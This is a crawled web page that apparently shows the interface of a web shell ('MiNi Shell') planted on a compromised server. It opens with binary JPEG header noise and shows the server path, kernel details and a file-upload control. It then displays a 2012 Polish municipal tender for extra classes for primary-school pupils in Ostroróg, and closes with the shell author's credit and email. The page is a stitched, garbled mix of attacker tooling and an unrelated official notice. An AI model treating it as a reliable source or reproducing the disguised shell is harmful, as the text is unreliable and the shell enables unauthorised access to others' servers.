JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120821/308066-N-2012.html

<p class="kh_header"><b>Ostroróg: Realizacja zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego dla uczniów klas I-III w szkole podstawowej na terenie Gminy Ostroróg w ramach Projektu Indywidualizacja nauczania w Zespole Szkół w Ostrorogu</b><br>
<b>Numer ogłoszenia: 308066 - 2012; data zamieszczenia: 21.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Ostroróg , ul. Wroniecka 14, 64-560 Ostroróg, woj. wielkopolskie, tel. 061 29 31 710, faks 061 29 31 712.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrorog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego dla uczniów klas I-III w szkole podstawowej na terenie Gminy Ostroróg w ramach Projektu Indywidualizacja nauczania w Zespole Szkół w Ostrorogu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług polegających na prowadzeniu zajęć w projekcie POKL.09.01.02-12-30-002/12-00. Przedmiotem zamówienia są usługi edukacyjne, obejmujące przeprowadzenie zajęć dydaktycznych w ramach projektu systemowego - Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w kontekście wdrażania nowej podstawy kształcenia ogólnego, w latach 2012-2013 w szkole podstawowej, dla której organem prowadzącym jest Gmina Ostroróg, woj. wielkopolskie. Projekt jest dofinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX, Poddziałanie 9.1.2.

Usługi edukacyjne będą realizowane w budynkach Zespołu Szkół w Ostrorogu. 
Przez jedną godzinę zajęć pozalekcyjnych rozumie się czas określony w §13.1 w Rozporządzeniu MEN w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach (DZ.U. z 2010r. nr 228 poz.1487).
Zajęcia muszą być prowadzone bezpośrednio po lekcjach i zgodnie z harmonogramem dowozów i odwozów dzieci z terenu gminy.
Zajęcia będą prowadzone w wymiarze 1 godziny tygodniowo dla 1 grupy - przez okres 30 tygodni (z wyłączeniem zadania Nr 4 i Nr 10); w ramach n/w zadań/części:

Zadanie Nr 1  - Zajęcia dla dzieci mających trudności w czytaniu i pisaniu 
Część 1 - Zajęcia dydaktyczno - wyrównawcze z języka polskiego - klasa Ia - 45 godzin
Część 2 - Zajęcia dydaktyczno - wyrównawcze z języka polskiego - klasa Ib - 30 godzin
Część 3 - Zajęcia dydaktyczno - wyrównawcze z języka polskiego - klasa Ib - 15 godzin
Część 4 - Zajęcia dydaktyczno - wyrównawcze z języka polskiego - klasa IIa - 30 godzin
Część 5 - Zajęcia dydaktyczno - wyrównawcze z języka polskiego - klasa IIb - 30 godzin
Część 6 - Zajęcia dydaktyczno - wyrównawcze z języka polskiego - klasa IIc - 30 godzin
Część 7 - Zajęcia dydaktyczno - wyrównawcze z języka polskiego - klasa IIIa - 30 godzin
Część 8 - Zajęcia dydaktyczno - wyrównawcze z języka polskiego - klasa IIIb - 30 godzin
Część - 9 Zajęcia dydaktyczno - wyrównawcze z języka polskiego - klasa IIIc - 30 godzin

Zadanie Nr 2 - Zajęcia dla dzieci mających trudności w zdobywaniu umiejętności matematycznych 
Część 1 - Zajęcia dydaktyczno - wyrównawcze z matematyki - klasa Ia - 30 godzin
Część 2 - Zajęcia dydaktyczno - wyrównawcze z matematyki - klasa Ia - 15 godzin
Część 3 - Zajęcia dydaktyczno - wyrównawcze z matematyki - klasa Ib - 45 godzin
Część 4 - Zajęcia dydaktyczno - wyrównawcze z matematyki - klasa IIa - 30 godzin
Część 5 - Zajęcia dydaktyczno - wyrównawcze z matematyki - klasa IIb - 30 godzin
Część 6 - Zajęcia dydaktyczno - wyrównawcze z matematyki - klasa IIc - 30 godzin
Część 7 - Zajęcia dydaktyczno - wyrównawcze z matematyki - klasa IIIa - 30 godzin
Część 8 - Zajęcia dydaktyczno - wyrównawcze z matematyki - klasa IIIb - 30 godzin
Część 9 - Zajęcia dydaktyczno - wyrównawcze z matematyki - klasa IIIc - 30 godzin

Zadanie Nr 3 - Zajęcia logopedyczne dla dzieci mających zaburzenia rozwoju mowy - w wymiarze 1 godziny tygodniowo dla 1 grupy przez okres 30 tygodni roku szkolnego 2012/2013. Przewiduje się utworzenie 10 grup - razem 300 godz.
Część 1 - Zajęcia logopedyczne odbywające się w 5-u grupach (podział wg wad wymowy) - w ilości 150 godzin
Część 2 - Zajęcia logopedyczne odbywające się w 5-u grupach (podział wg wad wymowy) - w ilości 150 godzin

Zadanie Nr 4 - Zajęcia dla dzieci mających zaburzenia komunikacji społecznej w wymiarze: 31 godz. dla 1 grupy w ciągu roku szkolnego 2012/2013. Przewiduje się utworzenie 10 grup - razem 310 godz.
Część 1 - 10 wyjazdów integracyjnych w ramach zajęć z komunikacji społecznej - 100 godzin 	(2 opiekunów)
Część 2 - Zajęcia z komunikacji społecznej - Arteterapia - 90 godzin
Część 3 - Zajęcia z komunikacji społecznej - Socjoterapia - 60 godzin
Część 4 - Zajęcia z komunikacji społecznej - Psychoterapia - 60 godzin

Zadanie Nr 5 - Zajęcia dla uczniów uzdolnionych, rozwijające zainteresowania matematyczne 	(kółko matematyczne) - w wymiarze 30 godz. w ciągu roku szkolnego 2012/2013. 	Przewiduje się utworzenie 1 grupy - razem 30 godz.

Zadanie Nr 6 - Zajęcia dla uczniów uzdolnionych, rozwijające zainteresowania przyrodnicze (kółko przyrodnicze ) - w wymiarze 30 godz. w ciągu roku szkolnego 2012/2013. Przewiduje się utworzenie 1 grupy - razem 30 godz..

Zadanie Nr 7 - Zajęcia dla uczniów uzdolnionych, rozwijające zainteresowania informatyczne 	(kółko informatyczne ) - w wymiarze 30 godz. w ciągu roku szkolnego 2012/2013. Przewiduje się utworzenie 1 grupy - razem 30 godz..

Zadanie Nr 8 - Zajęcia dla uczniów uzdolnionych, rozwijające zainteresowania sportowe (piłka 	nożna) - w wymiarze 30 godz. w ciągu roku szkolnego 2012/2013. Przewiduje się utworzenie 	1 grupy - razem 30 godz.

Zadanie Nr 9 - Zajęcia dla uczniów uzdolnionych, rozwijające zainteresowania z języka angielskiego (kółko z języka angielskiego)- w wymiarze 30 godz. w ciągu roku szkolnego 2012/2013. Przewiduje się utworzenie 1 grupy - razem 30 godz.

Zadanie Nr 10 - Zajęcia dla dzieci z wadami postawy - w wymiarze 210 godzin w ciągu roku 	szkolnego 2012/2013. 
Część 1 - Gimnastyka korekcyjna - prowadzona w 5-u grupach w ilości 150 godzin
Część II - Zajęcia na basenie (nauka pływania) w ilości 60 godzin.

Do obowiązków Wykonawcy należeć będzie w szczególności:
a.	opracowanie w terminie do 14 dni od daty zawarcia umowy o udzielenie zamówienia publicznego planu pracy zajęć pozalekcyjnych, obejmującego harmonogram oraz zakres zadani i przedstawienie go do akceptacji Dyrektorowi Szkoły;
b.	przeprowadzenie zajęć pozalekcyjnych zgodnie z zatwierdzonym planem pracy w terminie do 28.06.2013 r.
c.	prowadzenie na bieżąco szczegółowego dziennika zajęć w formie papierowej;
d.	wprowadzenie wszelkich zmian w grafiku zajęć (tzn. odpracowywanie zajęć w innym terminie niż ustalonym przez Biuro Projektu) spowodowanych chorobą Zleceniobiorcy lub innymi, niezależnymi okolicznościami wynikającymi z Kalendarza Szkoły, jest możliwe pod warunkiem zgłoszenia w/w zmian w Biurze Projektu z tygodniowym wyprzedzeniem.
e.	stosowanie się do zaleceń i umożliwienie kontroli zajęć zarówno przedstawicielom Biura Projektu jak i Instytucji Pośredniczącej oraz innym uprawnionym podmiotom w zakresie prawidłowości prowadzenia zajęć;
f.	uzupełnienie miesięcznych kart czasu pracy i składanie ich u Dyrektora Szkoły, do 5 dnia miesiąca następującego po miesiącu, w którym zajęcia się odbywały;
g.	przekazywanie na bieżąco (maksymalnie następnego dnia roboczego) wszystkich informacji dotyczących zagrożenia realizacji wskaźników oraz innych budzących, wątpliwości w zakresie sprawnej realizacji projektu;
h.	ponoszenie odpowiedzialności materialnej za powierzone mienie;
i.	przestrzeganie regulaminu obowiązującego w pomieszczeniach, w których będą prowadzone zajęcia;
j.	 decydowanie o doborze form, metod i środków dydaktycznych do przeprowadzenia zajęć,
k.	przeprowadzenie testu sprawdzającego po upływie 50% zaplanowanych godzin zajęć pozalekcyjnych,
l.	przeprowadzenie; po zakończeniu zajęć; wśród rodziców uczniów objętych wsparciem ankiety edukacyjnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4, 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 31.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca: 
wykaże, że posiada wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej - art. 20 ustawy z dn. 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. z 2008 r. Nr 69, poz. 415 z póź. zm.) - dotyczy tylko instytucji szkoleniowych;
przedłoży oświadczenie o spełnieniu warunków udziału w postępowaniu;
ponadto warunek ten będzie spełniony przez wykonawcę, który posiada wykształcenie wyższe kierunkowe, odpowiednie dla zadania, na które składa ofertę oraz przygotowanie pedagogiczne.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, gdy Wykonawcy wykażą, że prowadzili zajęcia z danego przedmiotu  w ilości 30 godz. lekcyjnych w okresie ostatnich 3 lat - załącznik nr 4</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, gdy Wykonawcy wykażą, że dysponują czasem w zakresie wykonania usługi edukacyjnej od poniedziałku do soboty w godzinach od 7.40 do 16.00 (zgodnie z potrzebami uczniów i organizacją pracy szkoły).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, gdy Wykonawcy wykażą, że znajdują się w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy wymagają zachowania formy pisemnej w postaci aneksu do Umowy pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostrorog.pl/BIP/Przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Ostroróg, ul. Wroniecka 14, 64-560 Ostroróg - pok. 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2012 godzina 09:00, miejsce: Urząd Miasta i Gminy Ostroróg, ul. Wroniecka 14, 64-560 Ostroróg - pokój nr 12 sekretariat - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest dofinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX, Poddziałanie 9.1.2.Świadczenie usług polegających na prowadzeniu zajęć w projekcie POKL.09.01.02-12-30-002/12-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com